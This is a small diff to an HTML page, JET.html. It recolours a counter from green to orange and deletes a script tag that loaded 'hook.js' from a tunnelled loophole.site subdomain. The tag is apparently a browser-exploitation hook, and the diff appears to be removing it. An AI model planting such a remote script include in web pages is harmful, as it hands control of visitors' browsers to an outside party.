--- a/JET.html
+++ b/JET.html
@@ -54,7 +54,7 @@
         }
 
         #show-counter {
-            color: green;
+            color: orange;
             font-size: 11vh;
             font-weight: bolder;
         }
@@ -105,7 +105,7 @@
     }
 
     </script>
-    <script src="https://294d2cf238e0640410fc843808c35523.loophole.site/hook.js"></script>
+ 
 </body>
 
 </html>
